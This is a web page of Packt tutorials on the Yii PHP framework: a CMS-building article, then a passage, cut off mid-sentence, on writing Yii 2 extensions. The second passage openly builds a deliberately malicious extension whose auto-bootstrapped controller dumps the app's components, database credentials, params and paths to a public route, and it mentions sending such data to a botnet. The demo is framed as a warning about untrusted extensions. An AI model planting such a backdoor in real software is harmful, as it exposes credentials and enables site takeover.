Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Server-Side Web Development

404 Articles
article-image-building-content-management-system
Packt
25 Sep 2014
25 min read
Save for later

Building a Content Management System

Packt
25 Sep 2014
25 min read
In this article by Charles R. Portwood II, the author of Yii Project Blueprints, we will look at how to create a feature-complete content management system and blogging platform. (For more resources related to this topic, see here.) Describing the project Our CMS can be broken down into several different components: Users who will be responsible for viewing and managing the content Content to be managed Categories for our content to be placed into Metadata to help us further define our content and users Search engine optimizations Users The first component of our application is the users who will perform all the tasks in our application. For this application, we're going to largely reuse the user database and authentication system. In this article, we'll enhance this functionality by allowing social authentication. Our CMS will allow users to register new accounts from the data provided by Twitter; after they have registered, the CMS will allow them to sign-in to our application by signing in to Twitter. To enable us to know if a user is a socially authenticated user, we have to make several changes to both our database and our authentication scheme. First, we're going to need a way to indicate whether a user is a socially authenticated user. Rather than hardcoding a isAuthenticatedViaTwitter column in our database, we'll create a new database table called user_metadata, which will be a simple table that contains the user's ID, a unique key, and a value. This will allow us to store additional information about our users without having to explicitly change our user's database table every time we want to make a change: ID INTEGER PRIMARY KEYuser_id INTEGERkey STRINGvalue STRINGcreated INTEGERupdated INTEGER We'll also need to modify our UserIdentity class to allow socially authenticated users to sign in. To do this, we'll be expanding upon this class to create a RemoteUserIdentity class that will work off the OAuth codes that Twitter (or any other third-party source that works with HybridAuth) provide to us rather than authenticating against a username and password. Content At the core of our CMS is our content that we'll manage. For this project, we'll manage simple blog posts that can have additional metadata associated with them. Each post will have a title, a body, an author, a category, a unique URI or slug, and an indication whether it has been published or not. Our database structure for this table will look as follows: ID INTEGER PRIMARY KEYtitle STRINGbody TEXTpublished INTEGERauthor_id INTEGERcategory_id INTEGERslug STRINGcreated INTEGERupdated INTEGER Each post will also have one or many metadata columns that will further describe the posts we'll be creating. We can use this table (we’ll call it content_metadata) to have our system store information about each post automatically for us, or add information to our posts ourselves, thereby eliminating the need to constantly migrate our database every time we want to add a new attribute to our content: ID INTEGER PRIMARY KEYcontent_id INTEGERkey STRINGvalue STRINGcreated INTEGERupdated INTEGER Categories Each post will be associated with a category in our system. These categories will help us further refine our posts. As with our content, each category will have its own slug. Before either a post or a category is saved, we'll need to verify that the slug is not already in use. Our table structure will look as follows: ID INTEGER PRIMARY KEYname STRINGdescription TEXTslug STRINGcreated INTEGERupdated INTEGER Search engine optimizations The last core component of our application is optimization for search engines so that our content can be indexed quickly. SEO is important because it increases our discoverability and availability both on search engines and on other marketing materials. In our application, there are a couple of things we'll perform to improve our SEO: The first SEO enhancement we'll add is a sitemap.xml file, which we can submit to popular search engines to index. Rather than crawl our content, search engines can very quickly index our sitemap.xml file, which means that our content will show up in search engines faster. The second enhancement we'll be adding is the slugs that we discussed earlier. Slugs allow us to indicate what a particular post is about directly from a URL. So rather than have a URL that looks like http://chapter6.example.com/content/post/id/5, we can have URL's that look like: http://chapter6.example.com/my-awesome-article. These types of URLs allow search engines and our users to know what our content is about without even looking at the content itself, such as when a user is browsing through their bookmarks or browsing a search engine. Initializing the project To provide us with a common starting ground, a skeleton project has been included with the project resources for this article. Included with this skeleton project are the necessary migrations, data files, controllers, and views to get us started with developing. Also included in this skeleton project are the user authentication classes. Copy this skeleton project to your web server, configure it so that it responds to chapter6.example.com as outlined at the beginning of the article, and then perform the following steps to make sure everything is set up: Adjust the permissions on the assets and protected/runtime folders so that they are writable by your web server. In this article, we'll once again use the latest version of MySQL (at the time of writing MySQL 5.6). Make sure that your MySQL server is set up and running on your server. Then, create a username, password, and database for our project to use, and update your protected/config/main.php file accordingly. For simplicity, you can use ch6_cms for each value. Install our Composer dependencies: Composer install Run the migrate command and install our mock data: php protected/yiic.php migrate up --interactive=0psql ch6_cms -f protected/data/postgres.sql Finally, add your SendGrid credentials to your protected/config/params.php file: 'username' => '<username>','password' => '<password>','from' => '[email protected]') If everything is loaded correctly, you should see a 404 page similar to the following: Exploring the skeleton project There are actually a lot of different things going on in the background to make this work even if this is just a 404 error. Before we start doing any development, let's take a look at a few of the classes that have been provided in our skeleton project in the protected/components folder. Extending models from a common class The first class that has been provided to us is an ActiveRecord extension called CMSActiveRecord that all of our models will stem from. This class allows us to reduce the amount of code that we have to write in each class. For now, we'll simply add CTimestampBehavior and the afterFind() method to store the old attributes for the time the need arises to compare the changed attributes with the new attributes: class CMSActiveRecordCMSActiveRecord extends CActiveRecord{public $_oldAttributes = array();public function behaviors(){return array('CTimestampBehavior' => array('class' => 'zii.behaviors.CTimestampBehavior','createAttribute' => 'created','updateAttribute' => 'updated','setUpdateOnCreate' => true));}public function afterFind(){if ($this !== NULL)$this->_oldAttributes = $this->attributes;return parent::afterFind();}} Creating a custom validator for slugs Since both Content and Category classes have slugs, we'll need to add a custom validator to each class that will enable us to ensure that the slug is not already in use by either a post or a category. To do this, we have another class called CMSSlugActiveRecord that extends CMSActiveRecord with a validateSlug() method that we'll implement as follows: class CMSSLugActiveRecord extends CMSActiveRecord{public function validateSlug($attributes, $params){// Fetch any records that have that slug$content = Content::model()->findByAttributes(array('slug' =>$this->slug));$category = Category::model()->findByAttributes(array('slug' =>$this->slug));$class = strtolower(get_class($this));if ($content == NULL && $category == NULL)return true;else if (($content == NULL && $category != NULL) || ($content !=NULL && $category == NULL)){$this->addError('slug', 'That slug is already in use');return false;}else{if ($this->id == $$class->id)return true;}$this->addError('slug', 'That slug is already in use');return false;}} This implementation simply checks the database for any item that has that slug. If nothing is found, or if the current item is the item that is being modified, then the validator will return true. Otherwise, it will add an error to the slug attribute and return false. Both our Content model and Category model will extend from this class. View management with themes One of the largest challenges of working with larger applications is changing their appearance without locking functionality into our views. One way to further separate our business logic from our presentation logic is to use themes. Using themes in Yii, we can dynamically change the presentation layer of our application simply utilizing the Yii::app()->setTheme('themename) method. Once this method is called, Yii will look for view files in themes/themename/views rather than protected/views. Throughout the rest of the article, we'll be adding views to a custom theme called main, which is located in the themes folder. To set this theme globally, we'll be creating a custom class called CMSController, which all of our controllers will extend from. For now, our theme name will be hardcoded within our application. This value could easily be retrieved from a database though, allowing us to dynamically change themes from a cached or database value rather than changing it in our controller. Have a look at the following lines of code: class CMSController extends CController{public function beforeAction($action){Yii::app()->setTheme('main');return parent::beforeAction($action);}} Truly dynamic routing In our previous applications, we had long, boring URL's that had lots of IDs and parameters in them. These URLs provided a terrible user experience and prevented search engines and users from knowing what the content was about at a glance, which in turn would hurt our SEO rankings on many search engines. To get around this, we're going to heavily modify our UrlManager class to allow truly dynamic routing, which means that, every time we create or update a post or a category, our URL rules will be updated. Telling Yii to use our custom UrlManager Before we can start working on our controllers, we need to create a custom UrlManager to handle routing of our content so that we can access our content by its slug. The steps are as follows: The first change we need to make to allow for this routing is to update the components section of our protected/config/main.php file. This will tell Yii what class to use for the UrlManager component: 'urlManager' => array('class' => 'application.components.CMSUrlManager','urlFormat' => 'path','showScriptName' => false) Next, within our protected/components folder, we need to create CMSUrlManager.php: class CMSUrlManager extends CUrlManager {} CUrlManager works by populating a rules array. When Yii is bootstrapped, it will trigger the processRules() method to determine which route should be executed. We can overload this method to inject our own rules, which will ensure that the action that we want to be executed is executed. To get started, let's first define a set of default routes that we want loaded. The routes defined in the following code snippet will allow for pagination on our search and home page, enable a static path for our sitemap.xml file, and provide a route for HybridAuth to use for social authentication: public $defaultRules = array('/sitemap.xml' => '/content/sitemap','/search/<page:d+>' => '/content/search','/search' => '/content/search','/blog/<page:d+>' => '/content/index','/blog' => '/content/index','/' => '/content/index','/hybrid/<provider:w+>' => '/hybrid/index',); Then, we'll implement our processRules() method: protected function processRules() {} CUrlManager already has a public property that we can interface to modify the rules, so we'll inject our own rules into this. The rules property is the same property that can be accessed from within our config file. Since processRules() gets called on every page load, we'll also utilize caching so that our rules don't have to be generated every time. We'll start by trying to load any of our pregenerated rules from our cache, depending upon whether we are in debug mode or not: $this->rules = !YII_DEBUG ? Yii::app()->cache->get('Routes') : array(); If the rules we get back are already set up, we'll simple return them; otherwise, we'll generate the rules, put them into our cache, and then append our basic URL rules: if ($this->rules == false || empty($this->rules)) { $this->rules = array(); $this->rules = $this->generateClientRules(); $this->rules = CMap::mergearray($this->addRssRules(), $this- >rules); Yii::app()->cache->set('Routes', $this->rules); } $this->rules['<controller:w+>/<action:w+>/<id:w+>'] = '/'; $this->rules['<controller:w+>/<action:w+>'] = '/'; return parent::processRules(); For abstraction purposes, within our processRules() method, we've utilized two methods we'll need to create: generateClientRules, which will generate the rules for content and categories, and addRSSRules, which will generate the RSS routes for each category. The first method, generateClientRules(), simply loads our default rules that we defined earlier with the rules generated from our content and categories, which are populated by the generateRules() method: private function generateClientRules() { $rules = CMap::mergeArray($this->defaultRules, $this->rules); return CMap::mergeArray($this->generateRules(), $rules); } private function generateRules() { return CMap::mergeArray($this->generateContentRules(), $this- >generateCategoryRules()); } The generateRules() method, that we just defined, actually calls the methods that build our routes. Each route is a key-value pair that will take the following form: array( '<slug>' => '<controller>/<action>/id/<id>' ) Content rules will consist of an entry that is published. Have a look at the following code: private function generateContentRules(){$rules = array();$criteria = new CDbCriteria;$criteria->addCondition('published = 1');$content = Content::model()->findAll($criteria);foreach ($content as $el){if ($el->slug == NULL)continue;$pageRule = $el->slug.'/<page:d+>';$rule = $el->slug;if ($el->slug == '/')$pageRule = $rule = '';$pageRule = $el->slug . '/<page:d+>';$rule = $el->slug;$rules[$pageRule] = "content/view/id/{$el->id}";$rules[$rule] = "content/view/id/{$el->id}";}return $rules;} Our category rules will consist of all categories in our database. Have a look at the following code: private function generateCategoryRules() { $rules = array(); $categories = Category::model()->findAll(); foreach ($categories as $el) { if ($el->slug == NULL) continue; $pageRule = $el->slug.'/<page:d+>'; $rule = $el->slug; if ($el->slug == '/') $pageRule = $rule = ''; $pageRule = $el->slug . '/<page:d+>'; $rule = $el->slug; $rules[$pageRule] = "category/index/id/{$el->id}"; $rules[$rule] = "category/index/id/{$el->id}"; } return $rules; } Finally, we'll add our RSS rules that will allow RSS readers to read all content for the entire site or for a particular category, as follows: private function addRSSRules() { $categories = Category::model()->findAll(); foreach ($categories as $category) $routes[$category->slug.'.rss'] = "category/rss/id/ {$category->id}"; $routes['blog.rss'] = '/category/rss'; return $routes; } Displaying and managing content Now that Yii knows how to route our content, we can begin work on displaying and managing it. Begin by creating a new controller called ContentController in protected/controllers that extends CMSController. Have a look at the following line of code: class ContentController extends CMSController {} To start with, we'll define our accessRules() method and the default layout that we're going to use. Here's how: public $layout = 'default';public function filters(){return array('accessControl',);}public function accessRules(){return array(array('allow','actions' => array('index', 'view', 'search'),'users' => array('*')),array('allow','actions' => array('admin', 'save', 'delete'),'users'=>array('@'),'expression' => 'Yii::app()->user->role==2'),array('deny', // deny all users'users'=>array('*'),),);} Rendering the sitemap The first method we'll be implementing is our sitemap action. In our ContentController, create a new method called actionSitemap(): public function actionSitemap() {} The steps to be performed are as follows: Since sitemaps come in XML formatting, we'll start by disabling WebLogRoute defined in our protected/config/main.php file. This will ensure that our XML validates when search engines attempt to index it: Yii::app()->log->routes[0]->enabled = false; We'll then send the appropriate XML headers, disable the rendering of the layout, and flush any content that may have been queued to be sent to the browser: ob_end_clean();header('Content-type: text/xml; charset=utf-8');$this->layout = false; Then, we'll load all the published entries and categories and send them to our sitemap view: $content = Content::model()->findAllByAttributes(array('published'=> 1));$categories = Category::model()->findAll();$this->renderPartial('sitemap', array('content' => $content,'categories' => $categories,'url' => 'http://'.Yii::app()->request->serverName .Yii::app()->baseUrl)) Finally, we have two options to render this view. We can either make it a part of our theme in themes/main/views/content/sitemap.php, or we can place it in protected/views/content/sitemap.php. Since a sitemap's structure is unlikely to change, let's put it in the protected/views folder: <?php echo '<?xml version="1.0" encoding="UTF-8"?>'; ?><urlset ><?php foreach ($content as $v): ?><url><loc><?php echo $url .'/'. htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc><lastmod><?php echo date('c',strtotime($v['updated']));?></lastmod><changefreq>weekly</changefreq><priority>1</priority></url><?php endforeach; ?><?php foreach ($categories as $v): ?><url><loc><?php echo $url .'/'. htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc><lastmod><?php echo date('c',strtotime($v['updated']));?></lastmod><changefreq>weekly</changefreq><priority>0.7</priority></url><?php endforeach; ?></urlset> You can now load http://chapter6.example.com/sitemap.xml in your browser to see the sitemap. Before you make your site live, be sure to submit this file to search engines for them to index. Displaying a list view of content Next, we'll implement the actions necessary to display all of our content and a particular post. We'll start by providing a paginated view of our posts. Since CListView and the Content model's search() method already provide this functionality, we can utilize those classes to generate and display this data: To begin with, open protected/models/Content.php and modify the return value of the search() method as follows. This will ensure that Yii's pagination uses the correct variable in our CListView, and tells Yii how many results to load per page. return new CActiveDataProvider($this, array('criteria' =>$criteria,'pagination' => array('pageSize' => 5,'pageVar' =>'page'))); Next, implement the actionIndex() method with the $page parameter. We've already told our UrlManager how to handle this, which means that we'll get pretty URI's for pagination (for example, /blog, /blog/2, /blog/3, and so on): public function actionIndex($page=1){// Model Search without $_GET params$model = new Content('search');$model->unsetAttributes();$model->published = 1;$this->render('//content/all', array('dataprovider' => $model->search()));} Then we'll create a view in themes/main/views/content/all.php, that will display the data within our dataProvider: <?php $this->widget('zii.widgets.CListView', array('dataProvider'=>$dataprovider,'itemView'=>'//content/list','summaryText' => '','pager' => array('htmlOptions' => array('class' => 'pager'),'header' => '','firstPageCssClass'=>'hide','lastPageCssClass'=>'hide','maxButtonCount' => 0))); Finally, copy themes/main/views/content/all.php from the project resources folder so that our views can render. Since our database has already been populated with some sample data, you can start playing around with the results right away, as shown in the following screenshot: Displaying content by ID Since our routing rules are already set up, displaying our content is extremely simple. All that we have to do is search for a published model with the ID passed to the view action and render it: public function actionView($id=NULL){// Retrieve the data$content = Content::model()->findByPk($id);// beforeViewAction should catch thisif ($content == NULL || !$content->published)throw new CHttpException(404, 'The article you specified doesnot exist.');$this->render('view', array('id' => $id,'post' => $content));} After copying themes/main/views/content/view.php from the project resources folder into your project, you'll be able to click into a particular post from the home page. In its actions present form, this action has introduced an interesting side effect that could negatively impact our SEO rankings on search engines—the same entry can now be accessed from two URI's. For example, http://chapter6.example.com/content/view/id/1 and http://chapter6.example.com/quis-condimentum-tortor now bring up the same post. Fortunately, correcting this bug is fairly easy. Since the goal of our slugs is to provide more descriptive URI's, we'll simply block access to the view if a user tries to access it from the non-slugged URI. We'll do this by creating a new method called beforeViewAction() that takes the entry ID as a parameter and gets called right after the actionView() method is called. This private method will simply check the URI from CHttpRequest to determine how actionView was accessed and return a 404 if it's not through our beautiful slugs: private function beforeViewAction($id=NULL){// If we do not have an ID, consider it to be null, and throw a 404errorif ($id == NULL)throw new CHttpException(404,'The specified post cannot befound.');// Retrieve the HTTP Request$r = new CHttpRequest();// Retrieve what the actual URI$requestUri = str_replace($r->baseUrl, '', $r->requestUri);// Retrieve the route$route = '/' . $this->getRoute() . '/' . $id;$requestUri = preg_replace('/?(.*)/','',$requestUri);// If the route and the uri are the same, then a direct accessattempt was made, and we need to block access to the controllerif ($requestUri == $route)throw new CHttpException(404, 'The requested post cannot befound.');return str_replace($r->baseUrl, '', $r->requestUri);} Then right after our actionView starts, we can simultaneously set the correct return URL and block access to the content if it wasn't accessed through the slug as follows: Yii::app()->user->setReturnUrl($this->beforeViewAction($id)); Adding comments to our CMS with Disqus Presently, our content is only informative in nature—we have no way for our users to communicate with us what they thought about our entry. To encourage engagement, we can add a commenting system to our CMS to further engage with our readers. Rather than writing our own commenting system, we can leverage comment through Disqus, a free, third-party commenting system. Even through Disqus, comments are implemented in JavaScript and we can create a custom widget wrapper for it to display comments on our site. The steps are as follows: To begin with, log in to the Disqus account you created at the beginning of this article as outlined in the prerequisites section. Then, navigate to http://disqus.com/admin/create/ and fill out the form fields as prompted and as shown in the following screenshot: Then, add a disqus section to your protected/config/params.php file with your site shortname: 'disqus' => array('shortname' => 'ch6disqusexample',) Next, create a new widget in protected/components called DisqusWidget.php. This widget will be loaded within our view and will be populated by our Content model: class DisqusWidget extends CWidget {} Begin by specifying the public properties that our view will be able to inject into as follows: public $shortname = NULL; public $identifier = NULL; public $url = NULL; public $title = NULL; Then, overload the init() method to load the Disqus JavaScript callback and to populate the JavaScript variables with those populated to the widget as follows:public function init() public function init(){parent::init();if ($this->shortname == NULL)throw new CHttpException(500, 'Disqus shortname isrequired');echo "<div id='disqus_thread'></div>";Yii::app()->clientScript->registerScript('disqus', "var disqus_shortname = '{$this->shortname}';var disqus_identifier = '{$this->identifier}';var disqus_url = '{$this->url}';var disqus_title = '{$this->title}';/* * * DON'T EDIT BELOW THIS LINE * * */(function() {var dsq = document.createElement('script'); dsq.type ='text/javascript'; dsq.async = true;dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);})();");} Finally, within our themes/main/views/content/view.php file, load the widget as follows: <?php $this->widget('DisqusWidget', array('shortname' => Yii::app()->params['includes']['disqus']['shortname'],'url' => $this->createAbsoluteUrl('/'.$post->slug),'title' => $post->title,'identifier' => $post->id)); ?> Now, when you load any given post, Disqus comments will also be loaded with that post. Go ahead and give it a try! Searching for content Next, we'll implement a search method so that our users can search for posts. To do this, we'll implement an instance of CActiveDataProvider and pass that data to our themes/main/views/content/all.php view to be rendered and paginated: public function actionSearch(){$param = Yii::app()->request->getParam('q');$criteria = new CDbCriteria;$criteria->addSearchCondition('title',$param,'OR');$criteria->addSearchCondition('body',$param,'OR');$dataprovider = new CActiveDataProvider('Content', array('criteria'=>$criteria,'pagination' => array('pageSize' => 5,'pageVar'=>'page')));$this->render('//content/all', array('dataprovider' => $dataprovider));} Since our view file already exists, we can now search for content in our CMS. Managing content Next, we'll implement a basic set of management tools that will allow us to create, update, and delete entries: We'll start by defining our loadModel() method and the actionDelete() method: private function loadModel($id=NULL){if ($id == NULL)throw new CHttpException(404, 'No category with that IDexists');$model = Content::model()->findByPk($id);if ($model == NULL)throw new CHttpException(404, 'No category with that IDexists');return $model;}public function actionDelete($id){$this->loadModel($id)->delete();$this->redirect($this->createUrl('content/admin'));} Next, we can implement our admin view, which will allow us to view all the content in our system and to create new entries. Be sure to copy the themes/main/views/content/admin.php file from the project resources folder into your project before using this view: public function actionAdmin(){$model = new Content('search');$model->unsetAttributes();if (isset($_GET['Content']))$model->attributes = $_GET;$this->render('admin', array('model' => $model));} Finally, we'll implement a save view to create and update entries. Saving content will simply pass it through our content model's validation rules. The only override we'll be adding is ensuring that the author is assigned to the user editing the entry. Before using this view, be sure to copy the themes/main/views/content/save.php file from the project resources folder into your project: public function actionSave($id=NULL){if ($id == NULL)$model = new Content;else$model = $this->loadModel($id);if (isset($_POST['Content'])){$model->attributes = $_POST['Content'];$model->author_id = Yii::app()->user->id;if ($model->save()){Yii::app()->user->setFlash('info', 'The articles wassaved');$this->redirect($this->createUrl('content/admin'));}}$this->render('save', array('model' => $model));} At this point, you can now log in to the system using the credentials provided in the following table and start managing entries: Username Password [email protected] test [email protected] test Summary In this article, we dug deeper into Yii framework by manipulating our CUrlManager class to generate completely dynamic and clean URIs. We also covered the use of Yii's built-in theming to dynamically change the frontend appearance of our site by simply changing a configuration value. Resources for Article: Further resources on this subject: Creating an Extension in Yii 2 [Article] Yii 1.1: Using Zii Components [Article] Agile with Yii 1.1 and PHP5: The TrackStar Application [Article]
Read more
  • 0
  • 0
  • 1683

article-image-creating-extension-yii-2
Packt
24 Sep 2014
22 min read
Save for later

Creating an Extension in Yii 2

Packt
24 Sep 2014
22 min read
In this article by Mark Safronov, co-author of the book Web Application Development with Yii 2 and PHP, we we'll learn to create our own extension using a simple way of installation. There is a process we have to follow, though some preparation will be needed to wire up your classes to the Yii application. The whole article will be devoted to this process. (For more resources related to this topic, see here.) Extension idea So, how are we going to extend the Yii 2 framework as an example for this article? Let's become vile this time and make a malicious extension, which will provide a sort of phishing backdoor for us. Never do exactly the thing we'll describe in this article! It'll not give you instant access to the attacked website anyway, but a skilled black hat hacker can easily get enough information to achieve total control over your application. The idea is this: our extension will provide a special route (a controller with a single action inside), which will dump the complete application configuration to the web page. Let's say it'll be reachable from the route /app-info/configuration. We cannot, however, just get the contents of the configuration file itself and that too reliably. At the point where we can attach ourselves to the application instance, the original configuration array is inaccessible, and even if it were accessible, we can't be sure about where it came from anyway. So, we'll inspect the runtime status of the application and return the most important pieces of information we can fetch at the stage of the controller action resolution. That's the exact payload we want to introduce. public function actionConfiguration()    {        $app = Yii::$app;        $config = [            'components' => $app->components,            'basePath' => $app->basePath,            'params' => $app->params,            'aliases' => Yii::$aliases        ];        return yiihelpersJson::encode($config);    } The preceding code is the core of the extension and is assumed in the following sections. In fact, if you know the value of the basePath setting of the application, a list of its aliases, settings for the components (among which the DB connection may reside), and all custom parameters that developers set manually, you can map the target application quite reliably. Given that you know all the credentials this way, you have an enormous amount of highly valuable information about the application now. All you need to do now is make the user install this extension. Creating the extension contents Our plan is as follows: We will develop our extension in a folder, which is different from our example CRM application. This extension will be named yii2-malicious, to be consistent with the naming of other Yii 2 extensions. Given the kind of payload we saw earlier, our extension will consist of a single controller and some special wiring code (which we haven't learned about yet) to automatically attach this controller to the application. Finally, to consider this subproject a true Yii 2 extension and not just some random library, we want it to be installable in the same way as other Yii 2 extensions. Preparing the boilerplate code for the extension Let's make a separate directory, initialize the Git repository there, and add the AppInfoController to it. In the bash command line, it can be achieved by the following commands: $ mkdir yii2-malicious && cd $_$ git init$ > AppInfoController.php Inside the AppInfoController.php file, we'll write the usual boilerplate code for the Yii 2 controller as follows: namespace malicious;use yiiwebController;class AppInfoController extends Controller{// Action here} Put the action defined in the preceding code snippet inside this controller and we're done with it. Note the namespace: it is not the same as the folder this controller is in, and this is not according to our usual auto-loading rules. We will explore later in this article that this is not an issue because of how Yii 2 treats the auto-loading of classes from extensions. Now this controller needs to be wired to the application somehow. We already know that the application has a special property called controllerMap, in which we can manually attach controller classes. However, how do we do this automatically, better yet, right at the application startup time? Yii 2 has a special feature called bootstrapping to support exactly this: to attach some activity at the beginning of the application lifetime, though not at the very beginning but before handling the request for sure. This feature is tightly related to the extensions concept in Yii 2, so it's a perfect time to explain it. FEATURE – bootstrapping To explain the bootstrapping concept in short, you can declare some components of the application in the yiibaseApplication::$bootstrap property. They'll be properly instantiated at the start of the application. If any of these components implement the BootstrapInterface interface, its bootstrap() method will be called, so you'll get the application initialization enhancement for free. Let's elaborate on this. The yiibaseApplication::$bootstrap property holds the array of generic values that you tell the framework to initialize beforehand. It's basically an improvement over the preload concept from Yii 1.x. You can specify four kinds of values to initialize as follows: The ID of an application component The ID of some module A class name A configuration array If it's the ID of a component, this component is fully initialized. If it's the ID of a module, this module is fully initialized. It matters greatly because Yii 2 has lazy loading employed on the components and modules system, and they are usually initialized only when explicitly referenced. Being bootstrapped means to them that their initialization, regardless of whether it's slow or resource-consuming, always happens, and happens always at the start of the application. If you have a component and a module with identical IDs, then the component will be initialized and the module will not be initialized! If the value being mentioned in the bootstrap property is a class name or configuration array, then the instance of the class in question is created using the yiiBaseYii::createObject() facility. The instance created will be thrown away immediately if it doesn't implement the yiibaseBootstrapInterface interface. If it does, its bootstrap() method will be called. Then, the object will be thrown away. So, what's the effect of this bootstrapping feature? We already used this feature while installing the debug extension. We had to bootstrap the debug module using its ID, for it to be able to attach the event handler so that we would get the debug toolbar at the bottom of each page of our web application. This feature is indispensable if you need to be sure that some activity will always take place at the start of the application lifetime. The BootstrapInterface interface is basically the incarnation of a command pattern. By implementing this interface, we gain the ability to attach any activity, not necessarily bound to the component or module, to the application initialization. FEATURE – extension registering The bootstrapping feature is repeated in the handling of the yiibaseApplication::$extensions property. This property is the only place where the concept of extension can be seen in the Yii framework. Extensions in this property are described as a list of arrays, and each of them should have the following fields: name: This field will be with the name of the extension. version: This field will be with the extension's version (nothing will really check it, so it's only for reference). bootstrap: This field will be with the data for this extension's Bootstrap. This field is filled with the same elements as that of Yii::$app->bootstrap described previously and has the same semantics. alias: This field will be with the mapping from Yii 2 path aliases to real directory paths. When the application registers the extension, it does two things in the following order: It registers the aliases from the extension, using the Yii::setAlias() method. It initializes the thing mentioned in the bootstrap of the extension in exactly the same way we described in the previous section. Note that the extensions' bootstraps are processed before the application's bootstraps. Registering aliases is crucial to the whole concept of extension in Yii 2. It's because of the Yii 2 PSR-4 compatible autoloader. Here is the quote from the documentation block for the yiiBaseYii::autoload() method: If the class is namespaced (e.g. yiibaseComponent), it will attempt to include the file associated with the corresponding path alias (e.g. @yii/base/Component.php). This autoloader allows loading classes that follow the PSR-4 standard and have its top-level namespace or sub-namespaces defined as path aliases. The PSR-4 standard is available online at http://www.php-fig.org/psr/psr-4/. Given that behavior, the alias setting of the extension is basically a way to tell the autoloader the name of the top-level namespace of the classes in your extension code base. Let's say you have the following value of the alias setting of your extension: "alias" => ["@companyname/extensionname" => "/some/absolute/path"] If you have the /some/absolute/path/subdirectory/ClassName.php file, and, according to PSR-4 rules, it contains the class whose fully qualified name is companynameextensionnamesubdirectoryClassName, Yii 2 will be able to autoload this class without problems. Making the bootstrap for our extension – hideous attachment of a controller We have a controller already prepared in our extension. Now we want this controller to be automatically attached to the application under attack when the extension is processed. This is achievable using the bootstrapping feature we just learned. Let's create the maliciousBootstrap class for this cause inside the code base of our extension, with the following boilerplate code: <?phpnamespace malicious;use yiibaseBootstrapInterface;class Bootstrap implements BootstrapInterface{/** @param yiiwebApplication $app */public function bootstrap($app){// Controller addition will be here.}} With this preparation, the bootstrap() method will be called at the start of the application, provided we wire everything up correctly. But first, we should consider how we manipulate the application to make use of our controller. This is easy, really, because there's the yiiwebApplication::$controllerMap property (don't forget that it's inherited from yiibaseModule, though). We'll just do the following inside the bootstrap() method: $app->controllerMap['app-info'] = 'maliciousAppInfoController'; We will rely on the composer and Yii 2 autoloaders to actually find maliciousAppInfoController. Just imagine that you can do anything inside the bootstrap. For example, you can open the CURL connection with some botnet and send the accumulated application information there. Never believe random extensions on the Web. This actually concludes what we need to do to complete our extension. All that's left now is to make our extension installable in the same way as other Yii 2 extensions we were using up until now. If you need to attach this malicious extension to your application manually, and you have a folder that holds the code base of the extension at the path /some/filesystem/path, then all you need to do is to write the following code inside the application configuration:  'extensions' => array_merge((require __DIR__ . '/../vendor/yiisoft/extensions.php'),['maliciousapp-info' => ['name' => 'Application Information Dumper','version' => '1.0.0','bootstrap' => 'maliciousBootstrap','alias' => ['@malicious' =>'/some/filesystem/path']// that's the path to extension]]) Please note the exact way of specifying the extensions setting. We're merging the contents of the extensions.php file supplied by the Yii 2 distribution from composer and our own manual definition of the extension. This extensions.php file is what allows Yiisoft to distribute the extensions in such a way that you are able to install them by a simple, single invocation of a require composer command. Let's learn now what we need to do to repeat this feature. Making the extension installable as... erm, extension First, to make it clear, we are talking here only about the situation when Yii 2 is installed by composer, and we want our extension to be installable through the composer as well. This gives us the baseline under all of our assumptions. Let's see the extensions that we need to install: Gii the code generator The Twitter Bootstrap extension The Debug extension The SwiftMailer extension We can install all of these extensions using composer. We introduce the extensions.php file reference when we install the Gii extension. Have a look at the following code: 'extensions' => (require __DIR__ . '/../vendor/yiisoft/extensions.php') If we open the vendor/yiisoft/extensions.php file (given that all extensions from the preceding list were installed) and look at its contents, we'll see the following code (note that in your installation, it can be different): <?php $vendorDir = dirname(__DIR__); return array ( 'yiisoft/yii2-bootstrap' => array ( 'name' => 'yiisoft/yii2-bootstrap', 'version' => '9999999-dev', 'alias' => array ( '@yii/bootstrap' => $vendorDir . '/yiisoft/yii2-bootstrap', ), ), 'yiisoft/yii2-swiftmailer' => array ( 'name' => 'yiisoft/yii2-swiftmailer', 'version' => '9999999-dev', 'alias' => array ( '@yii/swiftmailer' => $vendorDir . ' /yiisoft/yii2-swiftmailer', ), ), 'yiisoft/yii2-debug' => array ( 'name' => 'yiisoft/yii2-debug', 'version' => '9999999-dev', 'alias' => array ( '@yii/debug' => $vendorDir . '/yiisoft/yii2-debug', ), ), 'yiisoft/yii2-gii' => array ( 'name' => 'yiisoft/yii2-gii', 'version' => '9999999-dev', 'alias' => array ( '@yii/gii' => $vendorDir . '/yiisoft/yii2-gii', ), ), ); One extension was highlighted to stand out from the others. So, what does all this mean to us? First, it means that Yii 2 somehow generates the required configuration snippet automatically when you install the extension's composer package Second, it means that each extension provided by the Yii 2 framework distribution will ultimately be registered in the extensions setting of the application Third, all the classes in the extensions are made available in the main application code base by the carefully crafted alias settings inside the extension configuration Fourth, ultimately, easy installation of Yii 2 extensions is made possible by some integration between the Yii framework and the composer distribution system The magic is hidden inside the composer.json manifest of the extensions built into Yii 2. The details about the structure of this manifest are written in the documentation of composer, which is available at https://getcomposer.org/doc/04-schema.md. We'll need only one field, though, and that is type. Yii 2 employs a special type of composer package, named yii2-extension. If you check the manifests of yii2-debug, yii2-swiftmail and other extensions, you'll see that they all have the following line inside: "type": "yii2-extension", Normally composer will not understand that this type of package is to be installed. But the main yii2 package, containing the framework itself, depends on the special auxiliary yii2-composer package: "require": {… other requirements ..."yiisoft/yii2-composer": "*", This package provides Composer Custom Installer (read about it at https://getcomposer.org/doc/articles/custom-installers.md), which enables this package type. The whole point in the yii2-extension package type is to automatically update the extensions.php file with the information from the extension's manifest file. Basically, all we need to do now is to craft the correct composer.json manifest file inside the extension's code base. Let's write it step by step. Preparing the correct composer.json manifest We first need a block with an identity. Have a look at the following lines of code: "name": 